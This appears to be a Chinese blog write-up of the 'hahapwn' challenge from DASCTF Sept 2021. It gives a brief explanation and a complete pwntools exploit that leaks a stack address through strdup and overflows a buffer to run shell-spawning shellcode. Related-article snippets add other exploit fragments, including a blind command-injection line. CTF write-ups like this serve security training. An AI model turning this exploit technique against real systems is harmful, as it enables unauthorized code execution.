2021 DASCTF Sept X 浙江工业大学秋季挑战赛 pwn hahapwn

最新推荐文章于 2023-06-05 19:18:21 发布
最新推荐文章于 2023-06-05 19:18:21 发布
阅读量235 收藏
点赞数 1
分类专栏: CTF 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yongbaoii/article/details/120477250
版权

在这里插入图片描述有个strdup要注意一下。

在这里插入图片描述有溢出。

通过strdup泄露栈地址,栈上布置shellcode,跳过去就好啦

exp

from pwn import*

context.log_level='debug'
context.arch='amd64'
context.os = "linux"
context.terminal = ["tmux", "splitw", "-h"] 

local = 1
if local:
    r = process('./1111111')
else:
    r = remote("node4.buuoj.cn", 25963)
    
#libc = ELF("/home/wuangwuang/glibc-all-in-one-master/glibc-all-in-one-master/libs/2.27-3ubuntu1.2_amd64/libc.so.6")
#libc = ELF("/home/wuangwuang/glibc-all-in-one-master/glibc-all-in-one-master/libs/2.23-0ubuntu11.2_amd64/libc.so.6")
libc = ELF("./libc.so.6")

sa = lambda s,n : r.sendafter(s,n)
sla = lambda s,n : r.sendlineafter(s,n)
sl = lambda s : r.sendline(s)
sd = lambda s : r.send(s)
rc = lambda n : r.recv(n)
ru = lambda s : r.recvuntil(s)
ti = lambda: r.interactive()
lg = lambda name,addr :log.success(name+":"+hex(addr))

def debug():
    gdb.attach(r)
    pause()


sa("well you input:\n", "a" * 32)
stack_addr = u64(ru('\x7f')[-6:] + '\x00\x00') - 0x50
lg("stack_addr", stack_addr)
#debug()

payload = asm(shellcraft.sh()).ljust(88, '\x00') + p64(stack_addr)
sla("EASY PWN PWN PWN~\n", payload)

r.interactive()
yongbaoii
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
TCG_PCClient_PP_1p3_for_Library_1p59_pub_29sept2021.pdf
07-21
TPM 相关技术规范
[DASCTF 2023六月挑战赛|二进制专项] 5个pwn
weixin_52640415的博客
06-04 1257
格式化字符串漏洞利用argv链 6次free的off_by_null printf改system
DASCTF 2023六月挑战赛|二进制专项 PWN
weixin_51890658的博客
06-05 383
通过ida分析和gdb调试i在rbp-c中,它是int类型占4字节,还有两次格式化字符串漏洞,可通过这两次修改为i的值,第一次是把args参数链修改为i地址,第二次是修改i值即可再次使用格式化字符串漏洞。因为有堆溢出和uaf,可以伪装fastchunk,通过gdb调试0x602095地址的值为0x7f,可伪装。64位,也给了libc库,开了canary和pie地址随机 拖入ida看存在格式化字符串漏洞,有3次。64位的,给了libc库,开了canary,拖入ida分析,在edit函数中存在堆溢出。
DASCTF Sept X 浙江工业大学秋季挑战赛
zylxixixi的博客
10-17 380
hehepwn 首先check一下安全防护机制,全红。 分析程序,程序逻辑非常简单。 思路首先通过strdup泄露栈地址,后面控制返回地址到栈上,执行shellcode。 from pwn import * sh = process('./bypwn') context(os='linux',arch='amd64',log_level='DEBUG') #sh = remote('node4.buuoj.cn',25111) pop_rdi = 0x000000000040092..
DASCTF Sept X 浙江工业大学秋季挑战赛 hellounser
Tajang的大千世界
02-09 217
我傻逼,当时没做出来,赛后看wp才理解,正则也要复习复习了
DASCTF 7月赋能赛pwn wp
N1rvana的博客
07-25 484
DASCTF 7月赋能赛pwn wp
Visual Assist X_10.9.2237.0
10-31
Windows 10 Build 15063.608, issued Sept 12th, broke a hook mechanism. Windows Version 1709 (Fall Creators Update), released Oct 17th, broke also CreateWindow(). Microsoft is actively seeking ...
microtca_short_form_sept_2006
07-20
microtca_short_form_sept_2006
工业必须掌握英文简写读写
11-12
FAT factory acceptance test 工厂验收测试 əkˈseptəns SAT site acceptance test 站点验收测试 sait DQR design qualification report 设计确认报告 ri'kɔ:d IQR installation qualification record 安装确认...
Sept8Exercises
05-10
#csc462UML 2015年9月3日,用于课堂作业的起始代码存储库。 目标是让班级克隆存储库,并通过导入3个班级练习的项目来用作本地蚀工作区进行分析。 删除不需要的软件包。 将JUnit测试添加到edu.elon.test包中的ATM...
DASCTF X GFCTF 2022十月挑战赛 - pwn
z1r0的博客
10-28 844
所以思路很好想出来,首先可以利用rax来控制rsi进行read任意写,再利用rax控制rsi到read_got这里进行任意地址写,写成syscall。这个时候我们把rax设置成0x3b也就是execve,控制rdi为bin_sh,把rsi和rdx置为0,最后直接调用read就可以getshell了。发现了这一个gadget,而404018正好是bss的地址,可读可写,所以我们可以利用上面第一次的任意地址写将bss这里的地址写成bin_sh。这里的地方,并且最后还可以控制ret。
DASCTF Sept X 浙江工业大学秋季挑战赛 writeup
09-26 2626
crypto-welcome 签到 已知n、m、c 求e,sage脚本 m = 73964803637492582853353338913523546944627084372081477892312545091623069227301 c = 21572244511100216966799370397791432119463715616349800194229377843045443048821 n = 2 ** 256 e=discrete_log(c,mod(m,n)) print(e) #348528
pwnDASCTF Sept 九月赛
woodwhale的博客
09-26 3686
pwnDASCTF Sept 月赛 1、hehepwn 先查看保护,栈可执行,想到shellcode 这题需要注意shellcode的写法 拖入ida中分析 一直以为iso scanf不能栈溢出,后来发现我是shabi 先进入sub_4007F9()函数 有个read函数,恰好读完s数组,由于printf是碰到\x00截断,所以如果我们输满0x20个padding就可以读取一个栈地址 我们可以把shellcode写入scanf输入的地址中,通过创建fake rbp进行栈迁移,而这个栈中存有我们写入
2021 DASCTF Sept X 浙江工业大学秋季挑战赛 pwn hehepwn
yongbaoii的博客
09-27 389
利用格式化字符串泄露canary再ret2libc就可以了。 开了沙箱,可以先mprotect一下,再用shellcode来orw。 exp from pwn import* context.log_level='debug' context.arch='amd64' context.os = "linux" context.terminal = ["tmux", "splitw", "-h"] local = 1 if local: r = process('./1111111') els.
2021 DASCTF Sept X 浙江工业大学秋季挑战赛 pwn datasystem
yongbaoii的博客
09-27 301
开了沙箱。 看到两个特征数的时候显然知道是md5了,密码需要md5.
DASCTF9月赛pwn-wp
Stella_Leo的博客
09-28 1504
DASCTF-2021-9月 头一次打安恒月赛,体验还不错,没有足够的时间,稍微看了下pwn,两个栈是我没想到的,然后还有一个heap题目,然而还需要先绕过re认证才能正常的pwn也是我没想到的。。 文章不贴图片了,较简单 hehepwn 啥保护没开 这是最简单的,就一个scanf明显的溢出,然后strdup函数那里,可以写满s把\x00打没了,然后泄露rbp,然后就是ret2shellcode exp #coding:utf-8 from pwn import * context.log_level='d
5月DASCTF
doudoudedi
05-24 1234
帮帮小红吧 命令盲注是我没有想到的 cat /flag |grep 'BJD{' || sleep(3); 密码bbcrypto 题目 # -*- coding:utf-8 -*- import A,SALT from itertools import * def encrypt(m, a, si): c="" for i in range(len(m)): c+=hex(((ord(m[i])) * a + ord(next(si))) % 128)[2:].zfill
DASCTF 6月部分pwn wp
starssgo的博客
06-27 1083
感觉质量挺高的,有点昏迷, 目录Memory-Monster-IVoooooordereasyheapspringboardsecret写在最后 Memory-Monster-IV 这个题我是真的服了,恶心了我一天时间,最后还是没出,知道是要改got表,而且每次只能改一个字节,第一次改后变成ret之类的无用函数,我是不想说啥,没复现出来,贴下作者的分析把: http://taqini.space/2020/06/26/DASCTF-June-Memory-Monster-IV-200pt/ 我感觉能学到的东
2021DASCTF实战精英夏令营暨DASCTF July X CBCTF old_thing
yongbaoii的博客
08-12 402
RELRO半开。 进来以后首先需要登录。 用户名是admin,但是密码需要逆向一下。 进来之后是两个功能,一个leak,一个overflow。 因为开了canary,所以我们只要先把canary最后一个字节的’\x00’写掉,然后泄露一下就好了。 之后就是overflow一套带走。 ...
r语言中paste(la," ",pct,"%",sept="")各参数的意义
最新发布
08-17
在你提供的例子中,paste(la," ",pct,"%",sept="")的各参数的意义如下: - la: 这是一个字符向量或者一个对象,表示需要连接的第一个对象。 - " ": 这是一个字符串,表示需要添加到连接对象之间的分隔符。在这个...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值